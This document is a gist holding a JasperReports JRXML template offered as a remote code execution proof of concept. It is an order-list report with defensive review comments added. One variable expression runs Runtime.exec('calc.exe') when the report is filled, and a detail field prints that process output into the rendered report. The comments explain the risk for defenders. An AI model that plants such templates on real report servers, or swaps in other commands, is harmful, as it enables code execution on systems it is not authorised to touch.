@IIIoKoLaDNeVCHEmneVinoVat
Forked from v-p-b/S2_Jasper_RCE.jrxml
Created December 7, 2018 02:33
JasperReports Remote Code Execution with a single .JRXML file
<?xml version="1.0" encoding="UTF-8"?>
<!-- JRXML report template. The CDATA bodies of the *Expression elements further down are
     source code evaluated by the report engine, not inert data, so this file has to be
     reviewed the way executable code is reviewed. -->
<!-- The DOCTYPE names an external DTD through a plain http:// system identifier. A parser
     that loads external subsets will try to fetch it over the network in clear text;
     consumers should resolve it from a local copy or disable external DTD loading. -->
<!DOCTYPE jasperReport PUBLIC "-//JasperReports//DTD Report Design//EN" "http://jasperreports.sourceforge.net/dtds/jasperreport.dtd">
<jasperReport name="FirstJasper" columnCount="2" pageWidth="595" pageHeight="842" columnWidth="270" columnSpacing="15" leftMargin="20" rightMargin="20" topMargin="30" bottomMargin="30">
<!-- Named text styles referenced by the style="..." attribute of report elements.
     Arial_Normal is the default (isDefault="true"). The three Arial styles map to
     Helvetica PDF fonts without embedding; the two Comic styles name TrueType files and
     ask for them to be embedded (isPdfEmbedded="true"). Comic_Normal is declared but no
     element in this file references it. -->
<style name="Arial_Normal" isDefault="true" fontName="Arial" fontSize="8" isBold="false" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
<style name="Arial_Bold" isDefault="false" fontName="Arial" fontSize="8" isBold="true" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Bold" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
<style name="Arial_Italic" isDefault="false" fontName="Arial" fontSize="8" isBold="false" isItalic="true" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Oblique" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
<style name="Comic_Normal" isDefault="false" fontName="Comic Sans MS" fontSize="10" isBold="false" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="COMIC.TTF" pdfEncoding="Identity-H" isPdfEmbedded="true"/>
<style name="Comic_Bold" isDefault="false" fontName="Comic Sans MS" fontSize="10" isBold="true" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="COMICBD.TTF" pdfEncoding="Identity-H" isPdfEmbedded="true"/>
<!-- Single report parameter; in this file it is read only by the page header text
     ("Max order ID is : ..."). -->
<parameter name="MaxOrderID" class="java.lang.Integer">
</parameter>
<!-- The query selects only literal values, aliased to the field names declared below, and
     has no FROM clause, so it does not depend on any table in the connected database.
     NOTE(review): whether a bare SELECT is accepted depends on the database in use. -->
<queryString><![CDATA[SELECT '2008-05-22 12:12:11' as ShippedDate,'HU' as ShipCountry, '2008-05-22 12:12:11' as RequiredDate,'cust' as CustomerID,1337 as OrderID,'jenny' as ShipName,1 as ShipVia,'1234' as ShipPostalCode, '2008-05-22 12:12:11' as OrderDate,'bp' as ShipCity, 'addr' as ShipAddress,1 as EmployeeID,'region' as ShipRegion,10 as Freight]]></queryString>
<!-- Field declarations: one per column alias of the query, each with the Java class the
     column value is exposed as through $F{...}. Only ShipCountry, OrderID, OrderDate,
     ShipRegion and Freight are referenced by expressions in this file; the remaining
     fields are declared but unused. -->
<field name="ShippedDate" class="java.sql.Timestamp">
</field>
<field name="ShipCountry" class="java.lang.String">
</field>
<field name="RequiredDate" class="java.sql.Timestamp">
</field>
<field name="CustomerID" class="java.lang.String">
</field>
<field name="OrderID" class="java.lang.Integer">
</field>
<field name="ShipName" class="java.lang.String">
</field>
<field name="ShipVia" class="java.lang.Integer">
</field>
<field name="ShipPostalCode" class="java.lang.String">
</field>
<field name="OrderDate" class="java.sql.Timestamp">
</field>
<field name="ShipCity" class="java.lang.String">
</field>
<field name="ShipAddress" class="java.lang.String">
</field>
<field name="EmployeeID" class="java.lang.Integer">
</field>
<field name="ShipRegion" class="java.lang.String">
</field>
<field name="Freight" class="java.lang.Double">
</field>
<!-- Report variables used for grouping and totals. Each variableExpression is source code
     operating on field values. -->
<!-- Upper-cased first character of ShipCountry; drives FirstLetterGroup. -->
<variable name="FirstLetter" class="java.lang.String" resetType="None">
<variableExpression><![CDATA[$F{ShipCountry}.substring(0, 1).toUpperCase()]]></variableExpression>
</variable>
<!-- Freight sums at five scopes: first-letter group, country group, column, page and
     (with no resetType given) the last one, which feeds the title sentence. -->
<variable name="FreightSumFirstLetterGroup" class="java.lang.Double" resetType="Group" resetGroup="FirstLetterGroup" calculation="Sum">
<variableExpression><![CDATA[$F{Freight}]]></variableExpression>
</variable>
<variable name="FreightSumCountryGroup" class="java.lang.Double" resetType="Group" resetGroup="CountryGroup" calculation="Sum">
<variableExpression><![CDATA[$F{Freight}]]></variableExpression>
</variable>
<variable name="FreightSumColumn" class="java.lang.Double" resetType="Column" calculation="Sum">
<variableExpression><![CDATA[$F{Freight}]]></variableExpression>
</variable>
<variable name="FreightSumPage" class="java.lang.Double" resetType="Page" calculation="Sum">
<variableExpression><![CDATA[$F{Freight}]]></variableExpression>
</variable>
<variable name="FreightSumReport" class="java.lang.Double" calculation="Sum">
<variableExpression><![CDATA[$F{Freight}]]></variableExpression>
</variable>
<!-- Latest OrderDate within the current country group; shown in the CountryGroup header. -->
<variable name="DateHighestCountryGroup" class="java.sql.Timestamp" resetType="Group" resetGroup="CountryGroup" calculation="Highest">
<variableExpression><![CDATA[$F{OrderDate}]]></variableExpression>
</variable>
<!-- Count over ShipRegion per country group; not referenced by any element in this file. -->
<variable name="RegionCountCountryGroup" class="java.lang.Integer" resetType="Group" resetGroup="CountryGroup" calculation="Count">
<variableExpression><![CDATA[$F{ShipRegion}]]></variableExpression>
</variable>
<!-- SECURITY: this variable is the code-execution demonstration named in the gist title.
     Its expression is not report data. It is Java source evaluated by the report engine,
     and it calls java.lang.Runtime.exec("calc.exe"), then wraps the process output stream
     in a java.util.Scanner whose delimiter \A makes the whole stream a single token.
     Consequence for defenders: whoever can supply or edit a JRXML that a server compiles
     and fills can run code with the privileges of that JVM. Treat report templates as
     code: accept them only from trusted authors, review expressions for Runtime,
     ProcessBuilder and reflection calls before deployment, run report generation under a
     least-privilege account, and alert on child processes started by the reporting JVM. -->
<variable name="myScanner" class="java.util.Scanner" resetType="None">
<variableExpression><![CDATA[new java.util.Scanner(java.lang.Runtime.getRuntime().exec("calc.exe").getInputStream()).useDelimiter("\\A")]]></variableExpression>
</variable>
<!-- Outer group keyed on $V{FirstLetter}. Each new group starts a new column and its
     header is reprinted on every page the group spans. -->
<group name="FirstLetterGroup" isStartNewColumn="true" isReprintHeaderOnEachPage="true" minHeightToStartNewPage="200">
<groupExpression><![CDATA[$V{FirstLetter}]]></groupExpression>
<!-- Header: tinted bar with a caption followed by the current first letter. -->
<groupHeader>
<band height="25">
<rectangle>
<reportElement x="0" y="14" width="270" height="11" forecolor="#ffdddd" backcolor="#ffdddd"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement mode="Opaque" x="0" y="14" width="120" height="11" forecolor="#ff0000" backcolor="#ffdddd" style="Arial_Italic"/>
<textElement>
<font isUnderline="true"/>
</textElement>
<text><![CDATA[Countries Starting With Letter :]]></text>
</staticText>
<textField>
<reportElement mode="Opaque" x="120" y="14" width="150" height="11" forecolor="#ff0000" backcolor="#ffdddd" style="Arial_Bold"/>
<textFieldExpression class="java.lang.String"><![CDATA[$V{FirstLetter}]]></textFieldExpression>
</textField>
</band>
</groupHeader>
<!-- Footer: red rule, then row count and freight total for the group.
     FirstLetterGroup_COUNT is not declared in this file; presumably the engine supplies a
     count variable per group (confirm against the engine documentation). -->
<groupFooter>
<band height="15">
<line>
<reportElement x="0" y="0" width="270" height="1" forecolor="#ff0000"/>
<graphicElement/>
</line>
<staticText>
<reportElement x="0" y="1" width="45" height="11" forecolor="#ff0000" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Count :]]></text>
</staticText>
<textField>
<reportElement x="45" y="1" width="25" height="11" forecolor="#ff0000" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Integer"><![CDATA[$V{FirstLetterGroup_COUNT}]]></textFieldExpression>
</textField>
<staticText>
<reportElement x="70" y="1" width="140" height="11" forecolor="#ff0000" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Total :]]></text>
</staticText>
<textField pattern="0.00">
<reportElement x="210" y="1" width="60" height="11" forecolor="#ff0000" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Double"><![CDATA[$V{FreightSumFirstLetterGroup}]]></textFieldExpression>
</textField>
</band>
</groupFooter>
</group>
<!-- Inner group keyed on the ShipCountry field; its header is reprinted on each page. -->
<group name="CountryGroup" isReprintHeaderOnEachPage="true">
<groupExpression><![CDATA[$F{ShipCountry}]]></groupExpression>
<!-- Header: country name on the left and, on the right, the latest order date of the
     group. That date field is evaluated at group end (evaluationTime="Group"). -->
<groupHeader>
<band height="15">
<line>
<reportElement x="0" y="14" width="270" height="1"/>
<graphicElement/>
</line>
<textField>
<reportElement x="10" y="2" width="100" height="11" style="Arial_Bold"/>
<textFieldExpression class="java.lang.String"><![CDATA[$F{ShipCountry}]]></textFieldExpression>
</textField>
<textField evaluationTime="Group" evaluationGroup="CountryGroup" pattern="EEE, MMM d, yyyy">
<reportElement x="170" y="2" width="100" height="11" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.sql.Timestamp"><![CDATA[$V{DateHighestCountryGroup}]]></textFieldExpression>
</textField>
</band>
</groupHeader>
<!-- Footer: grey bar with row count and freight total for the country.
     CountryGroup_COUNT is not declared in this file; presumably supplied by the engine. -->
<groupFooter>
<band height="15">
<rectangle>
<reportElement x="0" y="0" width="270" height="11" forecolor="#c0c0c0" backcolor="#c0c0c0"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement mode="Opaque" x="0" y="0" width="45" height="11" backcolor="#c0c0c0" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Count :]]></text>
</staticText>
<textField>
<reportElement mode="Opaque" x="45" y="0" width="25" height="11" backcolor="#c0c0c0" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Integer"><![CDATA[$V{CountryGroup_COUNT}]]></textFieldExpression>
</textField>
<staticText>
<reportElement mode="Opaque" x="70" y="0" width="140" height="11" backcolor="#c0c0c0" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Total :]]></text>
</staticText>
<textField pattern="0.00">
<reportElement mode="Opaque" x="210" y="0" width="60" height="11" backcolor="#c0c0c0" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Double"><![CDATA[$V{FreightSumCountryGroup}]]></textFieldExpression>
</textField>
</band>
</groupFooter>
</group>
<!-- Spacer group: its key is a Boolean that becomes true once BreakGroup_COUNT exceeds 5.
     Header and footer are empty bands, 5 units high, so the group only adds vertical space.
     BreakGroup_COUNT is not declared in this file; presumably supplied by the engine. -->
<group name="BreakGroup">
<groupExpression><![CDATA[new Boolean($V{BreakGroup_COUNT}.intValue() > 5)]]></groupExpression>
<groupHeader>
<band height="5">
</band>
</groupHeader>
<groupFooter>
<band height="5">
</band>
</groupFooter>
</group>
<!-- Title band: rule, a placeholder heading ("asdf"), a copyright line and a sentence
     summarising the order count and total freight. -->
<title>
<band height="100">
<elementGroup>
<line>
<reportElement x="0" y="0" width="555" height="1"/>
<graphicElement/>
</line>
</elementGroup>
<textField isBlankWhenNull="true">
<reportElement x="180" y="5" width="375" height="35" style="Comic_Bold"/>
<textElement textAlignment="Right">
<font size="22"/>
</textElement>
<textFieldExpression class="java.lang.String"><![CDATA["asdf"]]></textFieldExpression>
</textField>
<staticText>
<reportElement x="180" y="40" width="375" height="15" style="Arial_Italic"/>
<textElement textAlignment="Right">
<font size="12"/>
</textElement>
<text><![CDATA[(c)2001-2006 by teodord]]></text>
</staticText>
<!-- Evaluated at report end (evaluationTime="Report") so the totals are final.
     DecimalFormat is used unqualified; presumably java.text is visible to expressions by
     default (confirm for the engine version in use). -->
<textField evaluationTime="Report">
<reportElement x="255" y="55" width="100" height="40"/>
<textElement textAlignment="Justified"/>
<textFieldExpression class="java.lang.String"><![CDATA["There are " + String.valueOf($V{REPORT_COUNT}) + " orders on this report, with a total freight of " + new DecimalFormat("0.00").format($V{FreightSumReport}.doubleValue())]]></textFieldExpression>
</textField>
</band>
</title>
<!-- Page header: framed box with the report heading and the MaxOrderID parameter value. -->
<pageHeader>
<band height="45">
<rectangle>
<reportElement mode="Transparent" x="0" y="0" width="555" height="40"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement x="0" y="0" width="555" height="25"/>
<textElement textAlignment="Center">
<font size="18"/>
</textElement>
<text><![CDATA[Northwind Order List]]></text>
</staticText>
<!-- The only place $P{MaxOrderID} is read; String.valueOf renders a missing value as
     the text "null" instead of failing. -->
<textField>
<reportElement x="0" y="25" width="555" height="15"/>
<textElement textAlignment="Center">
<font size="10"/>
</textElement>
<textFieldExpression class="java.lang.String"><![CDATA["Max order ID is : " + String.valueOf($P{MaxOrderID})]]></textFieldExpression>
</textField>
</band>
</pageHeader>
<!-- Column header: dark bar with four white captions (Order; Name, City; Date; Freight)
     whose x offsets line up with the fields of the detail band. -->
<columnHeader>
<band height="11">
<rectangle>
<reportElement x="0" y="0" width="270" height="11" backcolor="#333333"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement mode="Opaque" x="0" y="0" width="40" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Center"/>
<text><![CDATA[Order]]></text>
</staticText>
<staticText>
<reportElement mode="Opaque" x="40" y="0" width="145" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Center"/>
<text><![CDATA[Name, City]]></text>
</staticText>
<staticText>
<reportElement mode="Opaque" x="185" y="0" width="50" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<text><![CDATA[Date]]></text>
</staticText>
<staticText>
<reportElement mode="Opaque" x="235" y="0" width="35" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Freight]]></text>
</staticText>
</band>
</columnHeader>
<!-- Detail band, rendered once per data row. -->
<detail>
<band height="13">
<!-- 1x1 red marker, printed only when OrderID is a multiple of 10. -->
<rectangle>
<reportElement x="0" y="4" width="1" height="1" forecolor="#ff0000" backcolor="#ff0000">
<printWhenExpression><![CDATA[new Boolean($F{OrderID}.intValue() % 10 == 0)]]></printWhenExpression>
</reportElement>
<graphicElement/>
</rectangle>
<!-- Two OrderID fields share one position with complementary print conditions:
     plain text normally, red bold when OrderID is a multiple of 10. -->
<textField>
<reportElement x="1" y="0" width="35" height="11">
<printWhenExpression><![CDATA[new Boolean($F{OrderID}.intValue() % 10 != 0)]]></printWhenExpression>
</reportElement>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Integer"><![CDATA[$F{OrderID}]]></textFieldExpression>
</textField>
<textField>
<reportElement x="1" y="0" width="35" height="11" forecolor="#ff0000" style="Arial_Bold">
<printWhenExpression><![CDATA[new Boolean($F{OrderID}.intValue() % 10 == 0)]]></printWhenExpression>
</reportElement>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Integer"><![CDATA[$F{OrderID}]]></textFieldExpression>
</textField>
<!-- SECURITY: this field sits under the "Name, City" column heading (x=40) but prints the
     token read from $V{myScanner} instead of any order field. Whatever that variable's
     expression produced therefore ends up in the generated report, which makes rendered
     output a place to look during incident review. Reviewers should check that every
     field expression in a template refers only to declared fields, parameters and
     benign variables. -->
<textField isStretchWithOverflow="true">
<reportElement positionType="Float" x="40" y="0" width="110" height="11"/>
<textElement/>
<textFieldExpression class="java.lang.String"><![CDATA[$V{myScanner}.next()]]></textFieldExpression></textField>
<textField isBlankWhenNull="true">
<reportElement x="155" y="0" width="25" height="11"/>
<textElement/>
<textFieldExpression class="java.lang.String"><![CDATA[$F{ShipRegion}]]></textFieldExpression>
</textField>
<textField pattern="dd/MM/yyyy">
<reportElement x="185" y="0" width="50" height="11"/>
<textElement/>
<textFieldExpression class="java.sql.Timestamp"><![CDATA[$F{OrderDate}]]></textFieldExpression>
</textField>
<textField pattern="0.00">
<reportElement x="235" y="0" width="35" height="11"/>
<textElement/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Double"><![CDATA[$F{Freight}]]></textFieldExpression>
</textField>
<!-- Thin grey separator under each row. -->
<line>
<reportElement positionType="Float" x="0" y="12" width="270" height="1" forecolor="#808080"/>
<graphicElement pen="Thin"/>
</line>
</band>
</detail>
<!-- Column footer: dark bar with the row count and freight total of the column.
     COLUMN_COUNT is not declared in this file; presumably a built-in engine variable. -->
<columnFooter>
<band height="11">
<rectangle>
<reportElement x="0" y="0" width="270" height="11" backcolor="#333333"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement mode="Opaque" x="0" y="0" width="45" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Count :]]></text>
</staticText>
<textField>
<reportElement mode="Opaque" x="45" y="0" width="25" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Integer"><![CDATA[$V{COLUMN_COUNT}]]></textFieldExpression>
</textField>
<staticText>
<reportElement mode="Opaque" x="70" y="0" width="140" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<text><![CDATA[Total :]]></text>
</staticText>
<textField pattern="0.00">
<reportElement mode="Opaque" x="210" y="0" width="60" height="11" forecolor="#ffffff" backcolor="#333333" style="Arial_Bold"/>
<textElement textAlignment="Right"/>
<textFieldExpression class="java.lang.Double"><![CDATA[$V{FreightSumColumn}]]></textFieldExpression>
</textField>
</band>
</columnFooter>
<!-- Page footer: framed box with the page row count (left), the page freight total
     (right) and "page / pages" in the middle. PAGE_COUNT and PAGE_NUMBER are not declared
     in this file; presumably built-in engine variables. -->
<pageFooter>
<band height="30">
<rectangle>
<reportElement mode="Transparent" x="0" y="5" width="555" height="25"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement x="5" y="10" width="50" height="20"/>
<textElement textAlignment="Right">
<font size="14"/>
</textElement>
<text><![CDATA[Count :]]></text>
</staticText>
<textField>
<reportElement x="55" y="10" width="45" height="20"/>
<textElement textAlignment="Right">
<font size="14"/>
</textElement>
<textFieldExpression class="java.lang.Integer"><![CDATA[$V{PAGE_COUNT}]]></textFieldExpression>
</textField>
<staticText>
<reportElement x="430" y="10" width="50" height="20"/>
<textElement textAlignment="Right">
<font size="14"/>
</textElement>
<text><![CDATA[Total :]]></text>
</staticText>
<textField pattern="0.00">
<reportElement x="480" y="10" width="70" height="20"/>
<textElement textAlignment="Right">
<font size="14"/>
</textElement>
<textFieldExpression class="java.lang.Double"><![CDATA[$V{FreightSumPage}]]></textFieldExpression>
</textField>
<!-- Current page number, evaluated when the band is rendered. -->
<textField>
<reportElement x="200" y="10" width="75" height="20"/>
<textElement textAlignment="Right">
<font size="14"/>
</textElement>
<textFieldExpression class="java.lang.Integer"><![CDATA[$V{PAGE_NUMBER}]]></textFieldExpression>
</textField>
<staticText>
<reportElement x="275" y="10" width="5" height="20"/>
<textElement textAlignment="Center">
<font size="14"/>
</textElement>
<text><![CDATA[/]]></text>
</staticText>
<!-- Same variable, but evaluated at report end (evaluationTime="Report"), so it
     presumably shows the final page count. -->
<textField evaluationTime="Report">
<reportElement x="280" y="10" width="75" height="20"/>
<textElement>
<font size="14"/>
</textElement>
<textFieldExpression class="java.lang.Integer"><![CDATA[$V{PAGE_NUMBER}]]></textFieldExpression>
</textField>
</band>
</pageFooter>
<!-- Summary band: grey box with a fixed closing message; contains no expressions. -->
<summary>
<band height="65">
<rectangle>
<reportElement x="0" y="10" width="555" height="55" backcolor="#c0c0c0"/>
<graphicElement/>
</rectangle>
<staticText>
<reportElement mode="Opaque" x="200" y="15" width="200" height="45" backcolor="#c0c0c0"/>
<textElement textAlignment="Justified">
<font size="12"/>
</textElement>
<text><![CDATA[That's All Folks! Hei_remind_me_to_put myself up for abduction. END!]]></text>
</staticText>
</band>
</summary>
</jasperReport>